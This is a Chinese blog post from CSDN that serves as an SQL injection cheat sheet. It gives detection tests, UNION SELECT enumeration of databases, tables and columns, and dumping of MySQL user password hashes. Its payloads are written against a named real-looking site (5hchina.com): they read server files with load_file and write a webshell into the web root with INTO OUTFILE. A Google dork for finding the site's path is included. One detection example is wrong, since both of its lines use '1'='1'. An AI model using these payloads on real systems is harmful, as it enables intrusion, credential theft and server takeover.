code_lab

小李飞刀成绝响,人间不见蛤丝香

SQL注入

1注入类型

   1.1数字型注入

   查询方式:   select * from 表名 where 字段名=数字 

   检测漏洞:   select * from 表名 where 字段名=数字 AND 1=1

                     select * from 表名 where 字段名=数字 AND 1=2

   1.2字符型注入

   查询方式:  select * from 表名 where 字段名='字符'

   检测漏洞:  select * from 表名 where 字段名='字符' AND '1'='1'

                     select * from 表名 where 字段名='字符' AND '1'='1'     

   1.3搜索型注入

   查询方式: select * from 表名 where 字段名 like '%字符%'

   检测漏洞: select * from 表名 where 字段名 like '%字符%'and 1=1 and '%'='%'

select * from 表名 where 字段名 like '%字符%'and 1=2 and '%'='%'


判断字段数: order by 数字

select * from 表名 where 字段名=数字order by 数字

根据返回值判断返回的是哪个字段:select * from 表名 where 字段名=1 union all select 1,2,3

返回 数据库名 用户名等信息:select * from 表名 where 字段名=1 union all selectuser(),database(),3


根据数据库名得到表名(mysql5.0之后的版本可用):

select table_name from information_schema.tables where table_schema = '数据库名'

具体应用:(例子中表有三个字段)

select * from表名where字段名=1 union all select table_name,2,3 from information_schema.tables where table_schema = '数据库名'


根据表名得到字段名(mysql5.0之后的版本可用):

select column_name from information_schema.columns where table_schema='数据库名' and table_name='表名' ;

具体应用:(例子中表有三个字段):

select * from 表名 where 字段名=1 union all select column_name,2,3 from information_schema.columns where table_schema='数据库名' and table_name='表名'

参考:

version()版本 5.0.27-community-nt
database()数据库名 5hchina
user()当前用户 root 
@@version_compile_os 操作系统 win32


注意地方(获取到网站根路径)
怎么获取到网站根路径?
谷歌黑客 site:5hchina.com warning
文件报错
查看敏感文件 info.php phpinfo.php test.php
编码选择hex编码
如果不编码用''符号表示
符号的 反正型 “/”和“\”
D:\web\5hchina.com\根网站路径


root权限:
1.查看文件获取相关信息 
http://www.5hchina.com/news_view.php?id=-7405 UNION SELECT 1,2,load_file('D:/web/5hchina.com/index.php'),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
一般数据库链接文件:  conn.php common.php config.php


2.导入导出一句话拿shell (into outfile)
http://www.5hchina.com/news_view.php?id=-7405 UNION SELECT 1,2,'aaaa',4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 into outfile 'D:/web/5hchina.com/manage/upload/img/2.php'

或者




查询用户名密码:

select * from mysql.user ;
例子:
SELECT * FROM 表名 where 字段名=1 union all select User,Password,3 from mysql.user




阅读更多
版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/sinat_25449961/article/details/51558542
文章标签: sql注入 web安全
个人分类: Web安全
想对作者说点什么? 我来说一句

SQL注入工具

2011年11月16日 556KB 下载

sql数据库注入天书

2008年12月28日 14KB 下载

SQL注入手工检测sql注入检测

2010年04月21日 65KB 下载

SQL注入文章 欢迎下载

2011年03月12日 268KB 下载

SQL注入 如何防止SQL注入

2009年08月14日 95KB 下载

手工SQL注 入 教 程

2010年03月13日 126KB 下载

SQL注入天书SQL注入天书

2009年04月06日 7KB 下载

SQL注入脚本防SQL注入脚本

2010年11月26日 9KB 下载

没有更多推荐了,返回首页

不良信息举报

SQL注入

最多只允许输入30个字

加入CSDN,享受更精准的内容推荐,与500万程序员共同成长!
关闭
关闭